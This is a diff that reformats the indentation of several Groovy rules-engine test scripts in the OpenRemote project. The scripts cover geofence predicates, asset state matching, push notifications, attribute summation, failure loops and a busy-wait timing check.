@@ -24,11 +24,9 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Condition always throws exception")
-        .when(
-        { facts ->
-            throw new RuntimeException("Oops")
+        .when({ facts ->
+          throw new RuntimeException("Oops")
         })
-        .then(
-        { facts ->
-            // Never called
+        .then({ facts ->
+          // Never called
         })

--- a/test/src/test/resources/org/openremote/test/failure/RulesFailureLoop.groovy
+++ b/test/src/test/resources/org/openremote/test/failure/RulesFailureLoop.groovy
@@ -24,11 +24,9 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Condition loops")
-        .when(
-        { facts ->
-            true
+        .when({ facts ->
+          true
         })
-        .then(
-        { facts ->
-            // Never called
+        .then({ facts ->
+          // Never called
         })

--- a/test/src/test/resources/org/openremote/test/rules/BasicLocationPredicates.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/BasicLocationPredicates.groovy
@@ -29,36 +29,30 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Another radial location predicate")
-        .when(
-        { facts ->
-            facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate((new RadialGeofencePredicate(50, 0, -60))))).isPresent() &&
-                !facts.matchFirst("RadialLocation2").isPresent()
+        .when({ facts ->
+          facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate((new RadialGeofencePredicate(50, 0, -60))))).isPresent() &&
+          !facts.matchFirst("RadialLocation2").isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("RadialLocation2", "fired")
+        .then({ facts ->
+          facts.put("RadialLocation2", "fired")
         })
 
 rules.add()
-    .name("Duplicate radial location predicate")
-    .when(
-    { facts ->
-        facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RadialGeofencePredicate(100, ManagerTestSetup.SMART_BUILDING_LOCATION.y, ManagerTestSetup.SMART_BUILDING_LOCATION.x)))).isPresent() &&
-            !facts.matchFirst("DuplicateLocation").isPresent()
-    })
-    .then(
-    { facts ->
-        facts.put("DuplicateLocation", "fired")
-    })
+        .name("Duplicate radial location predicate")
+        .when({ facts ->
+          facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RadialGeofencePredicate(100, ManagerTestSetup.SMART_BUILDING_LOCATION.y, ManagerTestSetup.SMART_BUILDING_LOCATION.x)))).isPresent() &&
+          !facts.matchFirst("DuplicateLocation").isPresent()
+        })
+        .then({ facts ->
+          facts.put("DuplicateLocation", "fired")
+        })
 
 rules.add()
         .name("Rectangular location predicate")
-        .when(
-        { facts ->
-            facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(0, 50, 50, 100)))).isPresent() &&
-                !facts.matchFirst("RectLocation").isPresent()
+        .when({ facts ->
+          facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(0, 50, 50, 100)))).isPresent() &&
+          !facts.matchFirst("RectLocation").isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("RectLocation", "fired")
+        .then({ facts ->
+          facts.put("RectLocation", "fired")
         })

--- a/test/src/test/resources/org/openremote/test/rules/BasicLocationPredicates2.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/BasicLocationPredicates2.groovy
@@ -29,36 +29,30 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Another radial location predicate")
-        .when(
-        { facts ->
-            facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RadialGeofencePredicate(150, 10, 40)))).isPresent() &&
-                !facts.matchFirst("RadialLocation2").isPresent()
+        .when({ facts ->
+          facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RadialGeofencePredicate(150, 10, 40)))).isPresent() &&
+          !facts.matchFirst("RadialLocation2").isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("RadialLocation2", "fired")
+        .then({ facts ->
+          facts.put("RadialLocation2", "fired")
         })
 
 rules.add()
-    .name("Duplicate radial location predicate")
-    .when(
-    { facts ->
-        facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RadialGeofencePredicate(100, ManagerTestSetup.SMART_BUILDING_LOCATION.y, ManagerTestSetup.SMART_BUILDING_LOCATION.x)))).isPresent() &&
-            !facts.matchFirst("Location").isPresent()
-    })
-    .then(
-    { facts ->
-        facts.put("DuplicateLocation", "fired")
-    })
+        .name("Duplicate radial location predicate")
+        .when({ facts ->
+          facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RadialGeofencePredicate(100, ManagerTestSetup.SMART_BUILDING_LOCATION.y, ManagerTestSetup.SMART_BUILDING_LOCATION.x)))).isPresent() &&
+          !facts.matchFirst("Location").isPresent()
+        })
+        .then({ facts ->
+          facts.put("DuplicateLocation", "fired")
+        })
 
 rules.add()
         .name("Rectangular location predicate")
-        .when(
-        { facts ->
-            facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(0, 50, 50, 100)))).isPresent() &&
-                !facts.matchFirst("RectLocation").isPresent()
+        .when({ facts ->
+          facts.matchFirstAssetState(new AssetQuery().attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(0, 50, 50, 100)))).isPresent() &&
+          !facts.matchFirst("RectLocation").isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("RectLocation", "fired")
+        .then({ facts ->
+          facts.put("RectLocation", "fired")
         })

--- a/test/src/test/resources/org/openremote/test/rules/BasicMatchAllAssetStates.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/BasicMatchAllAssetStates.groovy
@@ -25,12 +25,10 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("All")
-        .when(
-        { facts ->
-            !facts.matchFirst("All").isPresent() &&
-                    facts.matchFirstAssetState(new AssetQuery()).isPresent()
+        .when({ facts ->
+          !facts.matchFirst("All").isPresent() &&
+          facts.matchFirstAssetState(new AssetQuery()).isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("All", "fired")
+        .then({ facts ->
+          facts.put("All", "fired")
         })

--- a/test/src/test/resources/org/openremote/test/rules/BasicMatchAllAssetStates2.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/BasicMatchAllAssetStates2.groovy
@@ -27,12 +27,10 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("All")
-        .when(
-        { facts ->
-            !facts.matchFirst("All").isPresent() &&
-                    facts.matchFirstAssetState(new AssetQuery()).isPresent()
+        .when({ facts ->
+          !facts.matchFirst("All").isPresent() &&
+          facts.matchFirstAssetState(new AssetQuery()).isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("All", "fired")
+        .then({ facts ->
+          facts.put("All", "fired")
         })

--- a/test/src/test/resources/org/openremote/test/rules/BasicSmartHomeMatchAllAssetStates.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/BasicSmartHomeMatchAllAssetStates.groovy
@@ -27,113 +27,98 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Living Room All")
-        .when(
-        { facts ->
-            !facts.matchFirst("Living Room All").isPresent() &&
-                    facts.matchFirstAssetState(new AssetQuery().names("Living Room 1")).isPresent()
+        .when({ facts ->
+          !facts.matchFirst("Living Room All").isPresent() &&
+          facts.matchFirstAssetState(new AssetQuery().names("Living Room 1")).isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("Living Room All", "fired")
+        .then({ facts ->
+          facts.put("Living Room All", "fired")
         })
 
 rules.add()
         .name("Kitchen All")
-        .when(
-        { facts ->
-            !facts.matchFirst("Kitchen All").isPresent() &&
-                    facts.matchFirstAssetState(new AssetQuery().names("Kitchen 1")).isPresent()
+        .when({ facts ->
+          !facts.matchFirst("Kitchen All").isPresent() &&
+          facts.matchFirstAssetState(new AssetQuery().names("Kitchen 1")).isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("Kitchen All", "fired")
+        .then({ facts ->
+          facts.put("Kitchen All", "fired")
         })
 
 rules.add()
         .name("Kitchen Number Attributes")
-        .when(
-        { facts ->
-            !facts.matchFirst("Kitchen Number Attributes").isPresent() &&
-                    facts.matchAssetState(new AssetQuery().names("Kitchen 1"))
-                            .filter({ assetState -> assetState.type == NUMBER })
-                            .findFirst().isPresent()
+        .when({ facts ->
+          !facts.matchFirst("Kitchen Number Attributes").isPresent() &&
+          facts.matchAssetState(new AssetQuery().names("Kitchen 1"))
+          .filter({ assetState -> assetState.type == NUMBER })
+          .findFirst().isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("Kitchen Number Attributes", "fired")
+        .then({ facts ->
+          facts.put("Kitchen Number Attributes", "fired")
         })
 
 rules.add()
         .name("Boolean attributes")
-        .when(
-        { facts ->
-            !facts.matchFirst("Boolean attributes").isPresent() &&
-                    facts.matchAssetState(new AssetQuery())
-                            .filter({ assetState -> assetState.type == BOOLEAN })
-                            .findFirst().isPresent()
+        .when({ facts ->
+          !facts.matchFirst("Boolean attributes").isPresent() &&
+          facts.matchAssetState(new AssetQuery())
+          .filter({ assetState -> assetState.type == BOOLEAN })
+          .findFirst().isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("Boolean attributes", "fired")
+        .then({ facts ->
+          facts.put("Boolean attributes", "fired")
         })
 
 rules.add()
         .name("String attributes")
-        .when(
-        { facts ->
-            !facts.matchFirst("String Attributes").isPresent() &&
-                    facts.matchAssetState(new AssetQuery())
-                            .filter({ assetState -> assetState.type == TEXT })
-                            .findFirst().isPresent()
+        .when({ facts ->
+          !facts.matchFirst("String Attributes").isPresent() &&
+          facts.matchAssetState(new AssetQuery())
+          .filter({ assetState -> assetState.type == TEXT })
+          .findFirst().isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("String Attributes", "fired")
+        .then({ facts ->
+          facts.put("String Attributes", "fired")
         })
 
 rules.add()
         .name("Number value types")
-        .when(
-        { facts ->
-            !facts.matchFirst("Number value types").isPresent() &&
-                    facts.matchAssetState(new AssetQuery())
-                            .filter({ assetState -> assetState.value.isPresent() })
-                            .findFirst().isPresent()
+        .when({ facts ->
+          !facts.matchFirst("Number value types").isPresent() &&
+          facts.matchAssetState(new AssetQuery())
+          .filter({ assetState -> assetState.value.isPresent() })
+          .findFirst().isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("Number value types", "fired")
+        .then({ facts ->
+          facts.put("Number value types", "fired")
         })
 
 rules.add()
         .name("Asset Type Room")
-        .when(
-        { facts ->
-            !facts.matchFirst("Asset Type Room").isPresent() &&
-                    facts.matchAssetState(new AssetQuery().types(RoomAsset))
-                            .findFirst().isPresent()
+        .when({ facts ->
+          !facts.matchFirst("Asset Type Room").isPresent() &&
+          facts.matchAssetState(new AssetQuery().types(RoomAsset))
+          .findFirst().isPresent()
         })
-        .then(
-        { facts ->
-            facts.put("Asset Type Room", "fired")
+        .then({ facts ->
+          facts.put("Asset Type Room", "fired")
         })
 
 // This is never matched, living room doesn't have child assets - testing negative
 rules.add()
         .name("Living Room as Parent")
-        .when(
-        { facts ->
+        .when({ facts ->
 
-            facts.matchAssetState(new AssetQuery().names("Living Room")).findFirst()
-                    .map{livingRoomState ->
-                            !facts.matchFirst("Living Room as Parent").isPresent() &&
-                                    facts.matchAssetState(new AssetQuery())
-                                            .filter({ assetState -> assetState.parentId == livingRoomState.id})
-                                            .findFirst().isPresent()
-                    }.orElse(false)
-
+          facts.matchAssetState(new AssetQuery().names("Living Room")).findFirst()
+          .map{livingRoomState ->
+            !facts.matchFirst("Living Room as Parent").isPresent() &&
+            facts.matchAssetState(new AssetQuery())
+            .filter({ assetState ->
+              assetState.parentId == livingRoomState.id
+            })
+            .findFirst().isPresent()
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            facts.put("Living Room as Parent", "fired")
+        .then({ facts ->
+          facts.put("Living Room as Parent", "fired")
         })

--- a/test/src/test/resources/org/openremote/test/rules/ChildAssetControl.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ChildAssetControl.groovy
@@ -17,9 +17,9 @@
  * SPDX-License-Identifier: AGPL-3.0-or-later
  */
 /*
-* An example rule for writing to child asset attributes by writing to the parent asset attributes; just specify the
-* parent asset ID below. The parent and child attributes must have the RULE_STATE configuration items set.
-*/
+ * An example rule for writing to child asset attributes by writing to the parent asset attributes; just specify the
+ * parent asset ID below. The parent and child attributes must have the RULE_STATE configuration items set.
+ */
 
 package org.openremote.setup.integration.rules
 
@@ -44,64 +44,64 @@ String parentAssetId = "3amk07u2gMoRlfzThYfwgT"
 
 rules.add()
         .name("Control children by controlling attributes on the parent asset itself")
-        .when(
-                { facts ->
+        .when({ facts ->
 
-                    List<AttributeInfo> changes = Collections.synchronizedList(new ArrayList<>())
+          List<AttributeInfo> changes = Collections.synchronizedList(new ArrayList<>())
 
-                    def childUpdates = facts.matchAssetState(
-                            new AssetQuery().ids(parentAssetId)
-                    ).filter { state ->
-                        def changed = false
+          def childUpdates = facts.matchAssetState(
+                          new AssetQuery().ids(parentAssetId)
+                          ).filter { state ->
+                    def changed = false
 
-                        // Get previous state from facts
-                        def previous = facts.matchFirst(state.id + state.name) as Optional<AttributeInfo>
+                    // Get previous state from facts
+                    def previous = facts.matchFirst(state.id + state.name) as Optional<AttributeInfo>
 
-                        if (previous.isEmpty()) {
-                            // Store initial state to avoid triggering on first run
-                            changes.add(state)
-                        } else if (state.timestamp > previous.map { it.timestamp }.orElse(0)) {
-                            // State has been updated (value may be the same but still push this to the children)
-                            changed = true
-                            changes.add(state)
-                        }
-
-                        return changed
-                    }.flatMap { changedState ->
-                        // Create attribute event for each child asset
-                        LOG.info("Parent asset attribute changed: " + changedState)
-
-                        // Get all child assets, create attribute events and bind these for the then trigger
-                        facts.matchAssetState(new AssetQuery().parents(parentAssetId).attributeName(changedState.name))
-                        .filter(childState -> childState.type == changedState.type)
-                        .map{childState -> new AttributeEvent(childState.id, childState.name, changedState.value, changedState.timestamp)}
-                    }.toList()
-
-                    if (!changes.isEmpty()) {
-                        facts.bind("changes", changes)
-
-                        if (!childUpdates.isEmpty()) {
-                            facts.bind("updates", childUpdates)
-                            LOG.info("Child asset update count: " + childUpdates.size())
-                        }
+                    if (previous.isEmpty()) {
+                      // Store initial state to avoid triggering on first run
+                      changes.add(state)
+                    } else if (state.timestamp> previous.map { it.timestamp }.orElse(0)) {
+                      // State has been updated (value may be the same but still push this to the children)
+                      changed = true
+                      changes.add(state)
                     }
 
-                    // Trigger the rule action if we have one or more changes to process
-                    return !changes.isEmpty()
-                })
-        .then(
-        { facts ->
-            def changes = facts.bound("changes") as List<AttributeInfo>
-            def updates = facts.bound("updates") as List<AttributeEvent>
+                    return changed
+                  }.flatMap { changedState ->
+                    // Create attribute event for each child asset
+                    LOG.info("Parent asset attribute changed: " + changedState)
 
-            // Create fact for state of attribute
-            changes.forEach {state ->
-                facts.put(state.id + state.name, state)
-            }
+                    // Get all child assets, create attribute events and bind these for the then trigger
+                    facts.matchAssetState(new AssetQuery().parents(parentAssetId).attributeName(changedState.name))
+                            .filter(childState -> childState.type == changedState.type)
+                            .map{childState ->
+                              new AttributeEvent(childState.id, childState.name, changedState.value, changedState.timestamp)
+                            }
+                  }.toList()
 
-            if (updates != null) {
-                updates.forEach {
-                    assets.dispatch(it)
-                }
+          if (!changes.isEmpty()) {
+            facts.bind("changes", changes)
+
+            if (!childUpdates.isEmpty()) {
+              facts.bind("updates", childUpdates)
+              LOG.info("Child asset update count: " + childUpdates.size())
             }
+          }
+
+          // Trigger the rule action if we have one or more changes to process
+          return !changes.isEmpty()
+        })
+        .then({ facts ->
+          def changes = facts.bound("changes") as List<AttributeInfo>
+          def updates = facts.bound("updates") as List<AttributeEvent>
+
+          // Create fact for state of attribute
+          changes.forEach {state ->
+            facts.put(state.id + state.name, state)
+          }
+
+          if (updates != null) {
+            updates.forEach {
+              assets.dispatch(it)
+            }
+          }
         })

--- a/test/src/test/resources/org/openremote/test/rules/ConsoleLocation.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ConsoleLocation.groovy
@@ -40,71 +40,67 @@ Assets assets = binding.assets
 
 rules.add()
         .name("Welcome home")
-        .when({
-    facts ->
+        .when({ facts ->
 
-        def consoleIds = facts.matchAssetState(new AssetQuery()
-                .types(ConsoleAsset.class)
-                .attributes(new LocationAttributePredicate(
-                new RadialGeofencePredicate(100, ManagerTestSetup.SMART_BUILDING_LOCATION.y, ManagerTestSetup.SMART_BUILDING_LOCATION.x))))
-                .filter({ !facts.getOptional("welcomeHome" + "_${it.id}").isPresent() })
-                .map({ it.id })
-                .collect()
+          def consoleIds = facts.matchAssetState(new AssetQuery()
+          .types(ConsoleAsset.class)
+          .attributes(new LocationAttributePredicate(
+                  new RadialGeofencePredicate(100, ManagerTestSetup.SMART_BUILDING_LOCATION.y, ManagerTestSetup.SMART_BUILDING_LOCATION.x))))
+          .filter({ !facts.getOptional("welcomeHome" + "_${it.id}").isPresent() })
+          .map({ it.id })
+          .collect()
 
-        if (consoleIds.size() > 0) {
+          if (consoleIds.size() > 0) {
             facts.bind("consoleIds", consoleIds)
             true
-        } else {
+          } else {
             false
-        }
-})
-        .then({
-    facts ->
+          }
+        })
+        .then({ facts ->
 
-        List<String> consoleIds = facts.bound("consoleIds")
-        if (consoleIds != null) {
-            List<Notification.Target> targets = consoleIds.stream().map{new Notification.Target(Notification.TargetType.ASSET, it)}.collect(Collectors.toList())
+          List<String> consoleIds = facts.bound("consoleIds")
+          if (consoleIds != null) {
+            List<Notification.Target> targets = consoleIds.stream().map{
+              new Notification.Target(Notification.TargetType.ASSET, it)
+            }.collect(Collectors.toList())
             Notification notification = new Notification(
-                "Welcome Home",
-                new PushNotificationMessage("Welcome Home", "No new events to report", null, null, null), targets, null, null)
+                            "Welcome Home",
+                            new PushNotificationMessage("Welcome Home", "No new events to report", null, null, null), targets, null, null)
 
             notifications.send(notification)
 
             consoleIds.forEach({
-                LOG.info("Welcome Home triggered: $it")
-                facts.put("welcomeHome" + "_${it}", it)
+              LOG.info("Welcome Home triggered: $it")
+              facts.put("welcomeHome" + "_${it}", it)
             })
-        }
-})
+          }
+        })
 
 rules.add()
         .name("Welcome home reset")
-        .when({
-    facts ->
+        .when({ facts ->
 
-        def consoleIds = facts.matchAssetState(new AssetQuery()
-                .types(ConsoleAsset.class)
-                .attributeValue(Asset.LOCATION.name, new ValueEmptyPredicate()))
-                .filter({ facts.getOptional("welcomeHome" + "_${it.id}").isPresent() })
-                .map({ it.id })
-                .collect()
+          def consoleIds = facts.matchAssetState(new AssetQuery()
+          .types(ConsoleAsset.class)
+          .attributeValue(Asset.LOCATION.name, new ValueEmptyPredicate()))
+          .filter({ facts.getOptional("welcomeHome" + "_${it.id}").isPresent() })
+          .map({ it.id })
+          .collect()
 
-        if (consoleIds.size() > 0) {
+          if (consoleIds.size() > 0) {
             facts.bind("consoleIds", consoleIds)
             true
-        } else {
+          } else {
             false
-        }
+          }
+        })
+        .then({ facts ->
 
-})
-        .then(
-        {
-            facts ->
+          List<String> consoleIds = facts.bound("consoleIds")
 
-                List<String> consoleIds = facts.bound("consoleIds")
-
-                consoleIds.forEach({
-                    LOG.info("Welcome Home Reset Triggered: $it")
-                    facts.remove("welcomeHome" + "_${it}")
-                })
+          consoleIds.forEach({
+            LOG.info("Welcome Home Reset Triggered: $it")
+            facts.remove("welcomeHome" + "_${it}")
+          })
         })

--- a/test/src/test/resources/org/openremote/test/rules/GroupSummationRule.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/GroupSummationRule.groovy
@@ -17,7 +17,7 @@
  * SPDX-License-Identifier: AGPL-3.0-or-later
  */
 /*
-Example group summation rule for the summation of child asset attributes to parent asset attributes:
+ Example group summation rule for the summation of child asset attributes to parent asset attributes:
  - The child and parent attributes must have the 'Rule state' configuration item added.
  - You must specify the parent asset ID below.
  */
@@ -53,101 +53,111 @@ rules.add()
         .name("Group summation rule")
         .when({ facts ->
 
-            // Check if parent asset ID is valid
-            Optional<AttributeInfo> parent = facts.matchFirstAssetState(new AssetQuery().ids(parentAssetId))
+          // Check if parent asset ID is valid
+          Optional<AttributeInfo> parent = facts.matchFirstAssetState(new AssetQuery().ids(parentAssetId))
 
-            if (parent.isEmpty()) {
-                LOG.warning("No Parent Asset found with ID: '" + parentAssetId + "'; Check Parent Asset ID and if the rule state configuration is added to the attribute")
-                return false
-            }
+          if (parent.isEmpty()) {
+            LOG.warning("No Parent Asset found with ID: '" + parentAssetId + "'; Check Parent Asset ID and if the rule state configuration is added to the attribute")
+            return false
+          }
 
-            // Find attribute changes in group for your attribute names
-            List<AttributeInfo> changes = facts
-                    .matchAssetState(new AssetQuery().parents(parentAssetId).attributeNames(attributeNames))
-                    .filter { attributeInfo ->
-                        boolean timestampChanged = false
+          // Find attribute changes in group for your attribute names
+          List<AttributeInfo> changes = facts
+                  .matchAssetState(new AssetQuery().parents(parentAssetId).attributeNames(attributeNames))
+                  .filter { attributeInfo ->
+                    boolean timestampChanged = false
 
-                        // Get previous attribute state from facts
-                        Optional<AttributeInfo> previous = facts.matchFirst(attributeInfo.id + attributeInfo.name)
+                    // Get previous attribute state from facts
+                    Optional<AttributeInfo> previous = facts.matchFirst(attributeInfo.id + attributeInfo.name)
 
-                        // Check if attribute timestamp has been updated (attribute value can be the same)
-                        if (attributeInfo.timestamp > previous.map { it.timestamp }.orElse(0)) {
-                            timestampChanged = true
-                        }
-
-                        return timestampChanged
+                    // Check if attribute timestamp has been updated (attribute value can be the same)
+                    if (attributeInfo.timestamp> previous.map { it.timestamp }.orElse(0)) {
+                      timestampChanged = true
                     }
+
+                    return timestampChanged
+                  }
+                  .toList()
+
+          // Get attribute names of changes
+          String[] changesAttributeNames = changes
+                  .collect { it.name }
+                  .unique()
+
+          // Find all relevant children attributes
+          List<AttributeInfo> childrenAttributes = Collections.synchronizedList(new ArrayList<>())
+
+          if (changesAttributeNames.length> 0) {
+            childrenAttributes = facts
+                    .matchAssetState(new AssetQuery().parents(parentAssetId).attributeNames(changesAttributeNames))
                     .toList()
+          }
 
-            // Get attribute names of changes
-            String[] changesAttributeNames = changes
-                    .collect { it.name }
-                    .unique()
+          // Bind attribute info for the then trigger
+          if (!changes.isEmpty()) {
+            facts.bind("parent", parent)
+            facts.bind("changes", changes)
 
-            // Find all relevant children attributes
-            List<AttributeInfo> childrenAttributes = Collections.synchronizedList(new ArrayList<>())
-
-            if (changesAttributeNames.length > 0) {
-                childrenAttributes = facts
-                        .matchAssetState(new AssetQuery().parents(parentAssetId).attributeNames(changesAttributeNames))
-                        .toList()
+            if (!childrenAttributes.isEmpty()) {
+              facts.bind("changesAttributeNames", changesAttributeNames)
+              facts.bind("childrenAttributes", childrenAttributes)
             }
+          }
 
-            // Bind attribute info for the then trigger
-            if (!changes.isEmpty()) {
-                facts.bind("parent", parent)
-                facts.bind("changes", changes)
-
-                if (!childrenAttributes.isEmpty()) {
-                    facts.bind("changesAttributeNames", changesAttributeNames)
-                    facts.bind("childrenAttributes", childrenAttributes)
-                }
-            }
-
-            // Trigger the rule 'then' action if there are changes to process
-            return !changes.isEmpty()
+          // Trigger the rule 'then' action if there are changes to process
+          return !changes.isEmpty()
         })
         .then({ facts ->
-            Optional<AttributeInfo> parent = facts.bound("parent")
-            List<AttributeInfo> changes = facts.bound("changes")
-            String[] changesAttributeNames = facts.bound("changesAttributeNames")
-            List<AttributeInfo> childrenAttributes = facts.bound("childrenAttributes")
+          Optional<AttributeInfo> parent = facts.bound("parent")
+          List<AttributeInfo> changes = facts.bound("changes")
+          String[] changesAttributeNames = facts.bound("changesAttributeNames")
+          List<AttributeInfo> childrenAttributes = facts.bound("childrenAttributes")
 
-            // Create fact for each attribute change
-            changes.forEach { attributeInfo -> facts.put(attributeInfo.id + attributeInfo.name, attributeInfo as Object) }
+          // Create fact for each attribute change
+          changes.forEach { attributeInfo ->
+            facts.put(attributeInfo.id + attributeInfo.name, attributeInfo as Object)
+          }
 
-            // Stop when group is empty
-            if (childrenAttributes == null) {
-                return
-            }
+          // Stop when group is empty
+          if (childrenAttributes == null) {
+            return
+          }
 
-            // Filter children attributes
-            List<AttributeInfo> childrenAttributesFiltered = childrenAttributes
+          // Filter children attributes
+          List<AttributeInfo> childrenAttributesFiltered = childrenAttributes
 
-            if (matchParentAssetType) {
-                childrenAttributesFiltered = childrenAttributes
-                        .findAll { it.assetType == parent.get().assetType }
-            }
+          if (matchParentAssetType) {
+            childrenAttributesFiltered = childrenAttributes
+                    .findAll { it.assetType == parent.get().assetType }
+          }
 
-            // Sum values per attribute
-            for (attributeName in changesAttributeNames) {
-                // Validate value type
-                boolean validValueType = childrenAttributesFiltered
-                        .find { it.name == attributeName }
-                        .collect { it.type.type.name }
-                        .any { it in ["java.lang.Double", "java.lang.Integer", "java.lang.Long", "java.math.BigDecimal", "java.math.BigInteger"] }
-
-                if (validValueType) {
-                    def sum = childrenAttributesFiltered
-                            .findAll { it.name == attributeName }
-                            .findAll { it.value.isPresent() }
-                            .collect { it.value.get() }
-                            .sum()
-
-                    // Update parent
-                    if (sum != null) {
-                        assets.dispatch(parentAssetId, attributeName, sum)
+          // Sum values per attribute
+          for (attributeName in changesAttributeNames) {
+            // Validate value type
+            boolean validValueType = childrenAttributesFiltered
+                    .find { it.name == attributeName }
+                    .collect { it.type.type.name }
+                    .any {
+                      it in [
+                        "java.lang.Double",
+                        "java.lang.Integer",
+                        "java.lang.Long",
+                        "java.math.BigDecimal",
+                        "java.math.BigInteger"
+                      ]
                     }
-                }
+
+            if (validValueType) {
+              def sum = childrenAttributesFiltered
+                      .findAll { it.name == attributeName }
+                      .findAll { it.value.isPresent() }
+                      .collect { it.value.get() }
+                      .sum()
+
+              // Update parent
+              if (sum != null) {
+                assets.dispatch(parentAssetId, attributeName, sum)
+              }
             }
+          }
         })

--- a/test/src/test/resources/org/openremote/test/rules/ParallelEngineCheck.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ParallelEngineCheck.groovy
@@ -28,24 +28,23 @@ Assets assets = binding.assets
 
 rules.add()
         .name("Long running rule")
-        .when(
-                {facts ->
-                    List<AttributeEvent> updates = Collections.synchronizedList(new ArrayList<>())
-                    facts.matchFirstAssetState(new AssetQuery().names("CounterAsset")).ifPresent { attr ->
-                        updates.add(new AttributeEvent(attr.id, attr.name, attr.value.orElse(0) + 1))
-                    }
-                    facts.bind("updates", updates)
-                    return true
-                })
-        .then(
-                { facts ->
-                    def updates = facts.bound("updates") as List<AttributeEvent>
-                    updates.forEach { event ->
-                        assets.dispatch(event) }
+        .when({facts ->
+          List<AttributeEvent> updates = Collections.synchronizedList(new ArrayList<>())
+          facts.matchFirstAssetState(new AssetQuery().names("CounterAsset")).ifPresent { attr ->
+            updates.add(new AttributeEvent(attr.id, attr.name, attr.value.orElse(0) + 1))
+          }
+          facts.bind("updates", updates)
+          return true
+        })
+        .then({ facts ->
+          def updates = facts.bound("updates") as List<AttributeEvent>
+          updates.forEach { event ->
+            assets.dispatch(event)
+          }
 
-                    // This used to be a Thread.sleep() but one test requires the wait to be non interruptible
-                    long startTime = System.currentTimeMillis()
-                    while ((System.currentTimeMillis() - startTime) < 600) {
-                        // Busy wait for 600ms - cannot be interrupted
-                    }
-                })
+          // This used to be a Thread.sleep() but one test requires the wait to be non interruptible
+          long startTime = System.currentTimeMillis()
+          while ((System.currentTimeMillis() - startTime) < 600) {
+            // Busy wait for 600ms - cannot be interrupted
+          }
+        })

--- a/test/src/test/resources/org/openremote/test/rules/ResidenceAutoVentilation.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ResidenceAutoVentilation.groovy
@@ -52,161 +52,153 @@ final VENTILATION_THRESHOLD_HIGH_HUMIDITY = 85d
 final VENTILATION_THRESHOLD_MEDIUM_TIME_WINDOW = "PT30M"
 final VENTILATION_THRESHOLD_HIGH_TIME_WINDOW = "PT15M"
 
-Closure<Stream<AssetState<?>>> residenceWithVentilationAutoMatch =
-        { RulesFacts facts, Operator operator, double ventilationLevelThreshold ->
-            // Any residence where auto ventilation is on
-            facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset).attributeValue("ventilationAuto", true)
-            ).filter { residenceWithVentilationAuto ->
+Closure<Stream<AssetState<?>>> residenceWithVentilationAutoMatch = { RulesFacts facts, Operator operator, double ventilationLevelThreshold ->
+  // Any residence where auto ventilation is on
+  facts.matchAssetState(
+  new AssetQuery().types(BuildingAsset).attributeValue("ventilationAuto", true)
+  ).filter { residenceWithVentilationAuto ->
 
-                // and ventilation level is above/below/equal/etc. threshold
-                if (operator == LESS_THAN) {
-                    // Used to have an implicit "OR NULL" which has now been removed
-                    def isNull = facts.matchFirstAssetState(
-                            new AssetQuery().ids(residenceWithVentilationAuto.id).attributeName("ventilationLevel")
-                    ).map {!it.value.isPresent()}.orElse(false)
+    // and ventilation level is above/below/equal/etc. threshold
+    if (operator == LESS_THAN) {
+      // Used to have an implicit "OR NULL" which has now been removed
+      def isNull = facts.matchFirstAssetState(
+              new AssetQuery().ids(residenceWithVentilationAuto.id).attributeName("ventilationLevel")
+              ).map {!it.value.isPresent()}.orElse(false)
 
-                    if (isNull) {
-                        return true
-                    }
-                }
+      if (isNull) {
+        return true
+      }
+    }
 
-                return facts.matchFirstAssetState(
-                    new AssetQuery().ids(residenceWithVentilationAuto.id)
-                            .attributeValue("ventilationLevel", operator, ventilationLevelThreshold)
-                    ).isPresent()
-            }
-        }
+    return facts.matchFirstAssetState(
+            new AssetQuery().ids(residenceWithVentilationAuto.id)
+            .attributeValue("ventilationLevel", operator, ventilationLevelThreshold)
+            ).isPresent()
+  }
+}
 
-Closure<Boolean> roomThresholdMatch =
-        { RulesFacts facts, AssetState residence, String attribute, boolean above, double threshold, String timeWindow ->
-            // Any room of the residence which has a level greater than zero
-            def roomWithMaxLevel = facts.matchAssetState(
